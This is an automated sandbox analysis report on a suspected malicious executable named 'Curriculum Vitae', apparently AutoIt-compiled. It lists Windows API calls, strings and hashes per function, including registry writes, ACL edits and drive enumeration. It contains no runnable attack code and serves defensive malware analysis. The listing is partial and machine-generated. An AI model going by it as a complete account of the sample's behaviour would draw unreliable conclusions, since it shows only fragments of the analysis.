                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D503EE), ref: 00D509DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0&
                      • API String ID: 0-2523485602
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00DB2B30
                      • DeleteObject.GDI32(00000000), ref: 00DB2B43
                      • DestroyWindow.USER32 ref: 00DB2B52
                      • GetDesktopWindow.USER32 ref: 00DB2B6D
                      • GetWindowRect.USER32(00000000), ref: 00DB2B74
                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DB2CA3
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DB2CB1
                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2CF8
                      • GetClientRect.USER32(00000000,?), ref: 00DB2D04
                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DB2D40
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D62
                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D75
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D80
                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D89
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2D98
                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2DA1
                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2DA8
                      • GlobalFree.KERNEL32(00000000), ref: 00DB2DB3
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2DC5
                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DCFC38,00000000), ref: 00DB2DDB
                      • GlobalFree.KERNEL32(00000000), ref: 00DB2DEB
                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DB2E11
                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DB2E30
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB2E52
                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB303F
                      Similarity
                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                      • String ID: $AutoIt v3$DISPLAY$static
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 00DC712F
                      • GetSysColorBrush.USER32(0000000F), ref: 00DC7160
                      • GetSysColor.USER32(0000000F), ref: 00DC716C
                      • SetBkColor.GDI32(?,000000FF), ref: 00DC7186
                      • SelectObject.GDI32(?,?), ref: 00DC7195
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DC71C0
                      • GetSysColor.USER32(00000010), ref: 00DC71C8
                      • CreateSolidBrush.GDI32(00000000), ref: 00DC71CF
                      • FrameRect.USER32(?,?,00000000), ref: 00DC71DE
                      • DeleteObject.GDI32(00000000), ref: 00DC71E5
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00DC7230
                      • FillRect.USER32(?,?,?), ref: 00DC7262
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC7284
                        • Part of subcall function 00DC73E8: GetSysColor.USER32(00000012), ref: 00DC7421
                        • Part of subcall function 00DC73E8: SetTextColor.GDI32(?,?), ref: 00DC7425
                        • Part of subcall function 00DC73E8: GetSysColorBrush.USER32(0000000F), ref: 00DC743B
                        • Part of subcall function 00DC73E8: GetSysColor.USER32(0000000F), ref: 00DC7446
                        • Part of subcall function 00DC73E8: GetSysColor.USER32(00000011), ref: 00DC7463
                        • Part of subcall function 00DC73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DC7471
                        • Part of subcall function 00DC73E8: SelectObject.GDI32(?,00000000), ref: 00DC7482
                        • Part of subcall function 00DC73E8: SetBkColor.GDI32(?,00000000), ref: 00DC748B
                        • Part of subcall function 00DC73E8: SelectObject.GDI32(?,?), ref: 00DC7498
                        • Part of subcall function 00DC73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00DC74B7
                        • Part of subcall function 00DC73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DC74CE
                        • Part of subcall function 00DC73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00DC74DB
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                      APIs
                      • DestroyWindow.USER32(?,?), ref: 00D48E14
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D86AC5
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D86AFE
                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D86F43
                        • Part of subcall function 00D48F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D48BE8,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D48FC5
                      • SendMessageW.USER32(?,00001053), ref: 00D86F7F
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D86F96
                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D86FAC
                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00D86FB7
                      Similarity
                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                      • String ID: 0
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 00DB273E
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DB286A
                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DB28A9
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DB28B9
                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DB2900
                      • GetClientRect.USER32(00000000,?), ref: 00DB290C
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DB2955
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DB2964
                      • GetStockObject.GDI32(00000011), ref: 00DB2974
                      • SelectObject.GDI32(00000000,00000000), ref: 00DB2978
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DB2988
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DB2991
                      • DeleteDC.GDI32(00000000), ref: 00DB299A
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DB29C6
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DB29DD
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DB2A1D
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DB2A31
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DB2A42
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DB2A77
                      • GetStockObject.GDI32(00000011), ref: 00DB2A82
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DB2A8D
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DB2A97
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA4AED
                      • GetDriveTypeW.KERNEL32(?,00DCCB68,?,\\.\,00DCCC08), ref: 00DA4BCA
                      • SetErrorMode.KERNEL32(00000000,00DCCB68,?,\\.\,00DCCC08), ref: 00DA4D36
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      APIs
                      • GetSysColor.USER32(00000012), ref: 00DC7421
                      • SetTextColor.GDI32(?,?), ref: 00DC7425
                      • GetSysColorBrush.USER32(0000000F), ref: 00DC743B
                      • GetSysColor.USER32(0000000F), ref: 00DC7446
                      • CreateSolidBrush.GDI32(?), ref: 00DC744B
                      • GetSysColor.USER32(00000011), ref: 00DC7463
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DC7471
                      • SelectObject.GDI32(?,00000000), ref: 00DC7482
                      • SetBkColor.GDI32(?,00000000), ref: 00DC748B
                      • SelectObject.GDI32(?,?), ref: 00DC7498
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00DC74B7
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DC74CE
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DC74DB
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DC752A
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00DC7554
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00DC7572
                      • DrawFocusRect.USER32(?,?), ref: 00DC757D
                      • GetSysColor.USER32(00000011), ref: 00DC758E
                      • SetTextColor.GDI32(?,00000000), ref: 00DC7596
                      • DrawTextW.USER32(?,00DC70F5,000000FF,?,00000000), ref: 00DC75A8
                      • SelectObject.GDI32(?,?), ref: 00DC75BF
                      • DeleteObject.GDI32(?), ref: 00DC75CA
                      • SelectObject.GDI32(?,?), ref: 00DC75D0
                      • DeleteObject.GDI32(?), ref: 00DC75D5
                      • SetTextColor.GDI32(?,?), ref: 00DC75DB
                      • SetBkColor.GDI32(?,?), ref: 00DC75E5
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      APIs
                      • GetCursorPos.USER32(?), ref: 00DC1128
                      • GetDesktopWindow.USER32 ref: 00DC113D
                      • GetWindowRect.USER32(00000000), ref: 00DC1144
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC1199
                      • DestroyWindow.USER32(?), ref: 00DC11B9
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DC11ED
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC120B
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DC121D
                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00DC1232
                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DC1245
                      • IsWindowVisible.USER32(00000000), ref: 00DC12A1
                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DC12BC
                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DC12D0
                      • GetWindowRect.USER32(00000000,?), ref: 00DC12E8
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00DC130E
                      • GetMonitorInfoW.USER32(00000000,?), ref: 00DC1328
                      • CopyRect.USER32(?,?), ref: 00DC133F
                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00DC13AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: 163e661145697ffc02f028c9ee835b8af5179a3cedae4a2a45aca257b492a084
                      • Instruction ID: 4a5d1b5b00355430b3d36ecbd0e77e7361c57ae003d9aaf21e89127896e55ed5
                      • Opcode Fuzzy Hash: 163e661145697ffc02f028c9ee835b8af5179a3cedae4a2a45aca257b492a084
                      • Instruction Fuzzy Hash: D7B19A75604352AFDB00DF64C885F6ABBE4FF85314F04891CF9999B2A2C731E845CBA1
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00DC02E5
                      • _wcslen.LIBCMT ref: 00DC031F
                      • _wcslen.LIBCMT ref: 00DC0389
                      • _wcslen.LIBCMT ref: 00DC03F1
                      • _wcslen.LIBCMT ref: 00DC0475
                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DC04C5
                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DC0504
                        • Part of subcall function 00D4F9F2: _wcslen.LIBCMT ref: 00D4F9FD
                        • Part of subcall function 00D9223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D92258
                        • Part of subcall function 00D9223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D9228A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$MessageSend$BuffCharUpper
                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                      • API String ID: 1103490817-719923060
                      • Opcode ID: 86c2b4fa55a4e3e8a490ee93041e953bccbacca5fe65c2febdd6f1404cb5b73d
                      • Instruction ID: e56aa5d12aa7d207712b7ed0a4b1c7cc3a89c5d43345f87c16a7b941258b86e3
                      • Opcode Fuzzy Hash: 86c2b4fa55a4e3e8a490ee93041e953bccbacca5fe65c2febdd6f1404cb5b73d
                      • Instruction Fuzzy Hash: 95E19C31218202CF8B14DF24C550E2ABBE5FF88314F19895DF9969B2A1DB30ED45CBB1
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D48968
                      • GetSystemMetrics.USER32(00000007), ref: 00D48970
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D4899B
                      • GetSystemMetrics.USER32(00000008), ref: 00D489A3
                      • GetSystemMetrics.USER32(00000004), ref: 00D489C8
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D489E5
                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D489F5
                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D48A28
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D48A3C
                      • GetClientRect.USER32(00000000,000000FF), ref: 00D48A5A
                      • GetStockObject.GDI32(00000011), ref: 00D48A76
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D48A81
                        • Part of subcall function 00D4912D: GetCursorPos.USER32(?), ref: 00D49141
                        • Part of subcall function 00D4912D: ScreenToClient.USER32(00000000,?), ref: 00D4915E
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000001), ref: 00D49183
                        • Part of subcall function 00D4912D: GetAsyncKeyState.USER32(00000002), ref: 00D4919D
                      • SetTimer.USER32(00000000,00000000,00000028,00D490FC), ref: 00D48AA8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
                      • API String ID: 1458621304-248962490
                      • Opcode ID: 2a5a18f3686bf17ee8cffab287f3fdaaabbec53257962db5f0062743c0a2dd5b
                      • Instruction ID: 256c8e4291b1ef9971070c28630717652200328e23a1bc7816c4731ce4682cdf
                      • Opcode Fuzzy Hash: 2a5a18f3686bf17ee8cffab287f3fdaaabbec53257962db5f0062743c0a2dd5b
                      • Instruction Fuzzy Hash: 3BB16A71A0020A9FDB14DFA8DD45BAE7BB5FB48314F144229FA19EB290DB70E941CF61
                      APIs
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D91114
                        • Part of subcall function 00D910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91120
                        • Part of subcall function 00D910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D9112F
                        • Part of subcall function 00D910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91136
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9114D
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D90DF5
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D90E29
                      • GetLengthSid.ADVAPI32(?), ref: 00D90E40
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D90E7A
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D90E96
                      • GetLengthSid.ADVAPI32(?), ref: 00D90EAD
                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D90EB5
                      • HeapAlloc.KERNEL32(00000000), ref: 00D90EBC
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D90EDD
                      • CopySid.ADVAPI32(00000000), ref: 00D90EE4
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D90F13
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D90F35
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D90F47
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90F6E
                      • HeapFree.KERNEL32(00000000), ref: 00D90F75
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90F7E
                      • HeapFree.KERNEL32(00000000), ref: 00D90F85
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90F8E
                      • HeapFree.KERNEL32(00000000), ref: 00D90F95
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D90FA1
                      • HeapFree.KERNEL32(00000000), ref: 00D90FA8
                        • Part of subcall function 00D91193: GetProcessHeap.KERNEL32(00000008,00D90BB1,?,00000000,?,00D90BB1,?), ref: 00D911A1
                        • Part of subcall function 00D91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D90BB1,?), ref: 00D911A8
                        • Part of subcall function 00D91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D90BB1,?), ref: 00D911B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                      • String ID:
                      • API String ID: 4175595110-0
                      • Opcode ID: 661d8c1304debeaafc7d042089c64ea6a8856af9866ace742e9bb7d5fae47aa7
                      • Instruction ID: c41b32991a4792b8031e7604b44dfdb9f5f8927eb9b1c254bfa631b2e386c9a0
                      • Opcode Fuzzy Hash: 661d8c1304debeaafc7d042089c64ea6a8856af9866ace742e9bb7d5fae47aa7
                      • Instruction Fuzzy Hash: ED711972A0420AAFDF209FA5EC45FAEBBB8EF05311F184115FA19E6291D7719A05CB70
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBC4BD
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DCCC08,00000000,?,00000000,?,?), ref: 00DBC544
                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00DBC5A4
                      • _wcslen.LIBCMT ref: 00DBC5F4
                      • _wcslen.LIBCMT ref: 00DBC66F
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00DBC6B2
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00DBC7C1
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00DBC84D
                      • RegCloseKey.ADVAPI32(?), ref: 00DBC881
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBC88E
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00DBC960
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 9721498-966354055
                      • Opcode ID: aaf08381a43c6fb03025923cae0d192c1002711e005f95ab59ea12c0ce4fd2cf
                      • Instruction ID: 18aeba9722390f33be1ae373749a27dc5e441811ebd8f2074827af6821c52e69
                      • Opcode Fuzzy Hash: aaf08381a43c6fb03025923cae0d192c1002711e005f95ab59ea12c0ce4fd2cf
                      • Instruction Fuzzy Hash: 9C126775614201DFDB24DF14C881A6AB7E5FF88714F08885DF88A9B3A2DB31ED41CBA1
                      APIs
                      • CharUpperBuffW.USER32(?,?), ref: 00DC09C6
                      • _wcslen.LIBCMT ref: 00DC0A01
